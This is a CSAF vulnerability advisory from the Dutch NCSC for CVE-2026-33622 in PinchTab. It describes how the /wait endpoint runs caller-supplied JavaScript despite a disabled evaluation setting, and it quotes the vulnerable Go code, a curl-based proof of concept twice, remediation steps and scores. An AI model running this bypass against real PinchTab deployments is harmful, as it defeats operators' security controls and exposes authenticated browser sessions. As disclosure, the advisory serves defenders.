{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33622",
        "tracking": {
            "current_release_date": "2026-03-31T16:25:33.441220Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33622",
            "initial_release_date": "2026-03-24T20:55:24.638399Z",
            "revision_history": [
                {
                    "date": "2026-03-24T20:55:24.638399Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:55:27.979639Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-25T18:12:52.319054Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:12:54.113564Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T21:27:26.952578Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T21:38:43.067788Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T21:38:50.074493Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T00:13:47.752394Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)."
                },
                {
                    "date": "2026-03-27T20:56:40.619081Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-27T20:56:43.724523Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T21:26:01.201323Z",
                    "number": "11",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-28T07:57:44.079613Z",
                    "number": "12",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-31T16:24:56.866348Z",
                    "number": "13",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-31T16:25:06.889773Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "14"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0.8.3|<=0.8.5",
                                "product": {
                                    "name": "vers:unknown/>=0.8.3|<=0.8.5",
                                    "product_id": "CSAFPID-5907195",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:pinchtab:pinchtab:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "pinchtab"
                    }
                ],
                "category": "vendor",
                "name": "pinchtab"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33622",
            "cwe": {
                "id": "CWE-94",
                "name": "Improper Control of Generation of Code ('Code Injection')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\nPinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled.\n\n`POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.\n\nThis is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.\n\nThe current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes.\n\n### Details\n**Issue 1 — `/evaluate` enforced the guard, `/wait` did not (`v0.8.3` through `v0.8.5`):**\nThe dedicated evaluate endpoint rejected requests when `security.allowEvaluate` was disabled:\n\n```go\n// internal/handlers/evaluate.go — v0.8.5\nfunc (h *Handlers) evaluateEnabled() bool {\n    return h != nil && h.Config != nil && h.Config.AllowEvaluate\n}\n\nfunc (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {\n    if !h.evaluateEnabled() {\n        httpx.ErrorCode(w, 403, \"evaluate_disabled\", httpx.DisabledEndpointMessage(\"evaluate\", \"security.allowEvaluate\"), false, map[string]any{\n            \"setting\": \"security.allowEvaluate\",\n        })\n        return\n    }\n    // ...\n}\n```\n\nIn the same releases, `/wait` did not apply that guard before evaluating `fn`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\nfunc (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {\n    mode := req.mode()\n    if mode == \"\" {\n        httpx.Error(w, 400, fmt.Errorf(\"one of selector, text, url, load, fn, or ms is required\"))\n        return\n    }\n\n    // No evaluateEnabled() check here in affected releases\n    // ...\n}\n```\n\n**Issue 2 — `fn` mode evaluated caller-supplied JavaScript directly:**\nThe `fn` branch built executable JavaScript from the request field and passed it to `chromedp.Evaluate`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\ncase \"fn\":\n    js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)\n    matchLabel = \"fn\"\n\n// Poll loop\nevalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, &result))\n```\n\nBecause `req.Fn` was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.\n\n**Issue 3 — Current worktree contains an unreleased fix:**\nThe current worktree closes this gap by making `fn` mode in `/wait` respect the same `security.allowEvaluate` policy boundary that `/evaluate` already enforced. The underlying non-code wait modes remain available.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`, `v0.8.4`, or `v0.8.5`\n- A configured API token\n- `security.allowEvaluate = false`\n- A reachable tab context, created by the caller or already present\n\n**Step 1 — Confirm `/evaluate` is blocked by policy**\n\n```bash\ncurl -s -X POST http://localhost:9867/evaluate \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"expression\":\"1+1\"}'\n```\n\nExpected:\n\n```json\n{\n  \"code\": \"evaluate_disabled\"\n}\n```\n\n**Step 2 — Open a tab**\n\n```bash\ncurl -s -X POST http://localhost:9867/navigate \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"url\":\"https://example.com\"}'\n```\n\nExample result:\n\n```json\n{\n  \"tabId\": \"<TAB_ID>\",\n  \"title\": \"Example Domain\",\n  \"url\": \"https://example.com/\"\n}\n```\n\n**Step 3 — Execute JavaScript through `/wait` using `fn` mode**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"tabId\":\"<TAB_ID>\",\n    \"fn\":\"(function(){window._poc_executed=true;return true})()\",\n    \"timeout\":5000\n  }'\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 1,\n  \"match\": \"fn\"\n}\n```\n\n**Step 4 — Verify the side effect**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"tabId\":\"<TAB_ID>\",\n    \"fn\":\"window._poc_executed === true\",\n    \"timeout\":3000\n  }'\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 0,\n  \"match\": \"fn\"\n}\n```\n\n**Observation**\n1. `/evaluate` returns `evaluate_disabled` when `security.allowEvaluate` is off.\n2. `/wait` still evaluates caller-supplied JavaScript through `fn` mode in the affected releases.\n3. The first `/wait` request introduces a side effect in page state.\n4. The second `/wait` request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.\n\n### Impact\n1. Bypass of the explicit `security.allowEvaluate` control in `v0.8.3` through `v0.8.5`.\n2. Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.\n3. Ability to read or modify page state and act within authenticated browser sessions available to that tab context.\n4. Inconsistent security boundaries between `/evaluate` and `/wait`, making the configured execution policy unreliable.\n5. This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.\n\n### Suggested Remediation\n1. Make `fn` mode in `/wait` enforce the same policy check as `/evaluate`.\n2. Keep non-code wait modes available when JavaScript evaluation is disabled.\n3. Add regression coverage so the policy boundary remains consistent across endpoints.",
                    "title": "github - https://api.github.com/advisories/GHSA-w5pc-m664-r62v"
                },
                {
                    "category": "description",
                    "text": "### Summary\nPinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled.\n\n`POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy.\n\nThis is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation.\n\nThe current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes.\n\n### Details\n**Issue 1 — `/evaluate` enforced the guard, `/wait` did not (`v0.8.3` through `v0.8.5`):**\nThe dedicated evaluate endpoint rejected requests when `security.allowEvaluate` was disabled:\n\n```go\n// internal/handlers/evaluate.go — v0.8.5\nfunc (h *Handlers) evaluateEnabled() bool {\n    return h != nil && h.Config != nil && h.Config.AllowEvaluate\n}\n\nfunc (h *Handlers) HandleEvaluate(w http.ResponseWriter, r *http.Request) {\n    if !h.evaluateEnabled() {\n        httpx.ErrorCode(w, 403, \"evaluate_disabled\", httpx.DisabledEndpointMessage(\"evaluate\", \"security.allowEvaluate\"), false, map[string]any{\n            \"setting\": \"security.allowEvaluate\",\n        })\n        return\n    }\n    // ...\n}\n```\n\nIn the same releases, `/wait` did not apply that guard before evaluating `fn`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\nfunc (h *Handlers) handleWaitCore(w http.ResponseWriter, r *http.Request, req waitRequest) {\n    mode := req.mode()\n    if mode == \"\" {\n        httpx.Error(w, 400, fmt.Errorf(\"one of selector, text, url, load, fn, or ms is required\"))\n        return\n    }\n\n    // No evaluateEnabled() check here in affected releases\n    // ...\n}\n```\n\n**Issue 2 — `fn` mode evaluated caller-supplied JavaScript directly:**\nThe `fn` branch built executable JavaScript from the request field and passed it to `chromedp.Evaluate`:\n\n```go\n// internal/handlers/wait.go — v0.8.5 (vulnerable)\ncase \"fn\":\n    js = fmt.Sprintf(`!!(function(){try{return %s}catch(e){return false}})()`, req.Fn)\n    matchLabel = \"fn\"\n\n// Poll loop\nevalErr := chromedp.Run(tCtx, chromedp.Evaluate(js, &result))\n```\n\nBecause `req.Fn` was interpolated directly into evaluated JavaScript, a caller could supply expressions with side effects, not just passive predicates.\n\n**Issue 3 — Current worktree contains an unreleased fix:**\nThe current worktree closes this gap by making `fn` mode in `/wait` respect the same `security.allowEvaluate` policy boundary that `/evaluate` already enforced. The underlying non-code wait modes remain available.\n\n### PoC\n**Prerequisites**\n\n- PinchTab `v0.8.3`, `v0.8.4`, or `v0.8.5`\n- A configured API token\n- `security.allowEvaluate = false`\n- A reachable tab context, created by the caller or already present\n\n**Step 1 — Confirm `/evaluate` is blocked by policy**\n\n```bash\ncurl -s -X POST http://localhost:9867/evaluate \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"expression\":\"1+1\"}'\n```\n\nExpected:\n\n```json\n{\n  \"code\": \"evaluate_disabled\"\n}\n```\n\n**Step 2 — Open a tab**\n\n```bash\ncurl -s -X POST http://localhost:9867/navigate \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"url\":\"https://example.com\"}'\n```\n\nExample result:\n\n```json\n{\n  \"tabId\": \"<TAB_ID>\",\n  \"title\": \"Example Domain\",\n  \"url\": \"https://example.com/\"\n}\n```\n\n**Step 3 — Execute JavaScript through `/wait` using `fn` mode**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"tabId\":\"<TAB_ID>\",\n    \"fn\":\"(function(){window._poc_executed=true;return true})()\",\n    \"timeout\":5000\n  }'\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 1,\n  \"match\": \"fn\"\n}\n```\n\n**Step 4 — Verify the side effect**\n\n```bash\ncurl -s -X POST http://localhost:9867/wait \\\n  -H \"Authorization: Bearer <TOKEN>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"tabId\":\"<TAB_ID>\",\n    \"fn\":\"window._poc_executed === true\",\n    \"timeout\":3000\n  }'\n```\n\nExample result:\n\n```json\n{\n  \"waited\": true,\n  \"elapsed\": 0,\n  \"match\": \"fn\"\n}\n```\n\n**Observation**\n1. `/evaluate` returns `evaluate_disabled` when `security.allowEvaluate` is off.\n2. `/wait` still evaluates caller-supplied JavaScript through `fn` mode in the affected releases.\n3. The first `/wait` request introduces a side effect in page state.\n4. The second `/wait` request confirms that the side effect occurred, demonstrating arbitrary JavaScript execution despite the disabled evaluate policy.\n\n### Impact\n1. Bypass of the explicit `security.allowEvaluate` control in `v0.8.3` through `v0.8.5`.\n2. Arbitrary JavaScript execution in the reachable browser tab context for callers who already possess the server API token.\n3. Ability to read or modify page state and act within authenticated browser sessions available to that tab context.\n4. Inconsistent security boundaries between `/evaluate` and `/wait`, making the configured execution policy unreliable.\n5. This is not an unauthenticated issue. Practical risk depends on who can access the API and whether the deployment exposes tabs containing sensitive authenticated state.\n\n### Suggested Remediation\n1. Make `fn` mode in `/wait` enforce the same policy check as `/evaluate`.\n2. Keep non-code wait modes available when JavaScript evaluation is disabled.\n3. Add regression coverage so the policy boundary remains consistent across endpoints.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-w5pc-m664-r62v.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33622"
                },
                {
                    "category": "description",
                    "text": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33622.json"
                },
                {
                    "category": "description",
                    "text": "A PinchTab Security Policy Bypass in /wait Allows Arbitrary JavaScript Execution in github.com/pinchtab/pinchtab",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4824.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00095",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "6.1",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "3.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, The value of the most recent EPSS score, Exploit code publicly available",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5907195"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-w5pc-m664-r62v"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-w5pc-m664-r62v.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33622"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33622.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4824.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-w5pc-m664-r62v"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-w5pc-m664-r62v"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33622"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5907195"
                    ]
                }
            ],
            "title": "CVE-2026-33622"
        }
    ]
}